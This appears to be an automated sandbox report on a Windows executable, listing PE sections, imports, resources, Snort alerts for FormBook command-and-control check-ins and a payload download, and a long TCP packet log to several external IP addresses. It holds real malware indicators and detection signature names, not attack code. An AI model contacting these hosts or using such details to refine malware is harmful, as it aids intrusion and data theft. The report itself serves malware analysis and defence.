IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6676	0x6800	False	0.6570763221153846	data	6.415810447422783	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x139a	0x1400	False	0.4498046875	data	5.141066817170598	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x66378	0x600	False	0.5091145833333334	data	4.106448979512574	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x71000	0x200000	0x0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x271000	0xb58	0xc00	False	0.435546875	data	4.642355228236412	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x271190	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States
RT_DIALOG	0x271478	0x120	data	English	United States
RT_DIALOG	0x271598	0x11c	data	English	United States
RT_DIALOG	0x2716b8	0x60	data	English	United States
RT_GROUP_ICON	0x271718	0x14	data	English	United States
RT_MANIFEST	0x271730	0x423	XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.20198.54.117.21249839802031412 03/30/23-14:26:23.800246	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49839	80	192.168.11.20	198.54.117.212
192.168.11.20198.54.117.21249839802031449 03/30/23-14:26:23.800246	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49839	80	192.168.11.20	198.54.117.212
192.168.11.2034.138.169.849790802018752 03/30/23-14:19:42.629466	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	49790	80	192.168.11.20	34.138.169.8
192.168.11.20198.54.117.21249839802031453 03/30/23-14:26:23.800246	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49839	80	192.168.11.20	198.54.117.212

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 30, 2023 14:19:42.487736940 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.628432989 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.628762960 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.629466057 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.769886971 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.770431042 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.770494938 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.770632982 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.770669937 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.770756960 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.770806074 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.770817041 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.770868063 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.770915985 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.770966053 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.770977974 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.770977974 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.771014929 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.771048069 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.771065950 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.771258116 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.771259069 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.771426916 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.911575079 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.911643028 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.911693096 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.911745071 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.911793947 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.911844015 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.911890984 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.911940098 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.911938906 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.911938906 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.911988974 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.912038088 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.912086010 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.912091017 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.912091017 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.912134886 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.912184000 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.912225962 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.912231922 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.912281990 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.912368059 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.912419081 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.912442923 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.912442923 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.912442923 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.912467957 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.912518024 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.912565947 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:42.912620068 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.912620068 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.912736893 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:42.912736893 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.052855015 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.052881002 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.052902937 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.052925110 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053034067 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053060055 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053077936 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.053081036 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053103924 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053124905 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053145885 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053165913 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053186893 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053208113 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053227901 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053246975 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.053248882 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053270102 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053289890 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053309917 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053330898 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053352118 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053373098 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053417921 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.053417921 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.053433895 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053436995 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053436995 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053457975 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053478956 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053499937 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053520918 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053540945 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053589106 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.053600073 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053601980 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053602934 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053623915 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053643942 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053664923 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053684950 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053704977 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053725958 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053746939 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053756952 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.053756952 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.053767920 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.053925991 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.054095984 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.194468021 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.194535017 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.194590092 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.194638968 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.194689035 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.194720984 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.194721937 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.194737911 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.194787025 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.194835901 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.194885969 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.194891930 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.194938898 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.194988966 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195038080 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195058107 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.195058107 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.195086956 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195137978 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195187092 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195236921 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195235014 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.195235014 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.195286989 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195336103 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195384979 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195396900 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.195396900 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.195435047 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195485115 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195533991 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195559978 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.195559978 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.195583105 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195632935 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195682049 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195732117 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195739031 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.195739031 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.195739031 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.195781946 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195831060 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195880890 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195905924 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.195930004 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.195980072 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196028948 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196078062 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196079016 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.196079016 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.196079016 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.196127892 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196177959 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196227074 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196247101 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.196275949 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196363926 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196391106 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.196391106 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.196392059 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.196415901 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196465969 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196516037 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196563959 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196584940 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.196614027 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196664095 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196712017 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196736097 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.196736097 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.196736097 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.196762085 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196811914 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196861029 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196908951 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.196911097 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.196962118 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197010994 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197057962 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197081089 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.197081089 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.197081089 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.197081089 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.197108030 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197158098 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197206020 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197242975 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.197243929 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.197256088 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197305918 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197355032 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197403908 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197418928 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.197418928 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.197454929 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197504044 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197552919 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197583914 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.197583914 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.197602034 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197652102 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197700977 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197750092 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197751999 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.197751999 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.197799921 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197848082 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197896957 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197922945 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.197923899 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.197947025 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.197995901 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.198045015 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.198093891 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.198093891 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.198093891 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.198143959 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.198193073 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.198242903 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.198261976 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.198261976 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.198292017 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.198343039 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:43.198412895 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.198412895 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.198576927 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:43.198576927 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:19:48.058748960 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 14:19:48.058881998 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:20:05.142395973 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 14:20:31.862673044 CEST	49759	443	192.168.11.20	2.16.241.97
Mar 30, 2023 14:20:31.873343945 CEST	443	49759	2.16.241.97	192.168.11.20
Mar 30, 2023 14:20:31.873481989 CEST	443	49759	2.16.241.97	192.168.11.20
Mar 30, 2023 14:20:31.873678923 CEST	49759	443	192.168.11.20	2.16.241.97
Mar 30, 2023 14:20:31.873678923 CEST	49759	443	192.168.11.20	2.16.241.97
Mar 30, 2023 14:21:14.095837116 CEST	49809	80	192.168.11.20	198.54.117.216
Mar 30, 2023 14:21:14.258656025 CEST	80	49809	198.54.117.216	192.168.11.20
Mar 30, 2023 14:21:14.259000063 CEST	49809	80	192.168.11.20	198.54.117.216
Mar 30, 2023 14:21:14.259000063 CEST	49809	80	192.168.11.20	198.54.117.216
Mar 30, 2023 14:21:14.421821117 CEST	80	49809	198.54.117.216	192.168.11.20
Mar 30, 2023 14:21:14.421897888 CEST	80	49809	198.54.117.216	192.168.11.20
Mar 30, 2023 14:21:34.590225935 CEST	49811	80	192.168.11.20	112.196.98.174
Mar 30, 2023 14:21:34.782375097 CEST	80	49811	112.196.98.174	192.168.11.20
Mar 30, 2023 14:21:34.782702923 CEST	49811	80	192.168.11.20	112.196.98.174
Mar 30, 2023 14:21:34.782742977 CEST	49811	80	192.168.11.20	112.196.98.174
Mar 30, 2023 14:21:34.974761009 CEST	80	49811	112.196.98.174	192.168.11.20
Mar 30, 2023 14:21:34.975202084 CEST	80	49811	112.196.98.174	192.168.11.20
Mar 30, 2023 14:21:34.975238085 CEST	80	49811	112.196.98.174	192.168.11.20
Mar 30, 2023 14:21:34.975619078 CEST	49811	80	192.168.11.20	112.196.98.174
Mar 30, 2023 14:21:34.975658894 CEST	49811	80	192.168.11.20	112.196.98.174
Mar 30, 2023 14:21:35.167829990 CEST	80	49811	112.196.98.174	192.168.11.20
Mar 30, 2023 14:22:17.359462976 CEST	49813	80	192.168.11.20	185.53.179.91
Mar 30, 2023 14:22:17.377875090 CEST	80	49813	185.53.179.91	192.168.11.20
Mar 30, 2023 14:22:17.378109932 CEST	49813	80	192.168.11.20	185.53.179.91
Mar 30, 2023 14:22:17.396522999 CEST	80	49813	185.53.179.91	192.168.11.20
Mar 30, 2023 14:22:17.396744013 CEST	49813	80	192.168.11.20	185.53.179.91
Mar 30, 2023 14:22:17.415158033 CEST	80	49813	185.53.179.91	192.168.11.20
Mar 30, 2023 14:22:17.415194035 CEST	80	49813	185.53.179.91	192.168.11.20
Mar 30, 2023 14:22:17.415219069 CEST	80	49813	185.53.179.91	192.168.11.20
Mar 30, 2023 14:22:17.415450096 CEST	49813	80	192.168.11.20	185.53.179.91
Mar 30, 2023 14:22:17.415450096 CEST	49813	80	192.168.11.20	185.53.179.91
Mar 30, 2023 14:22:17.434158087 CEST	80	49813	185.53.179.91	192.168.11.20
Mar 30, 2023 14:22:58.239475965 CEST	49815	80	192.168.11.20	212.32.237.91
Mar 30, 2023 14:22:58.255271912 CEST	80	49815	212.32.237.91	192.168.11.20
Mar 30, 2023 14:22:58.255517960 CEST	49815	80	192.168.11.20	212.32.237.91
Mar 30, 2023 14:22:58.255592108 CEST	49815	80	192.168.11.20	212.32.237.91
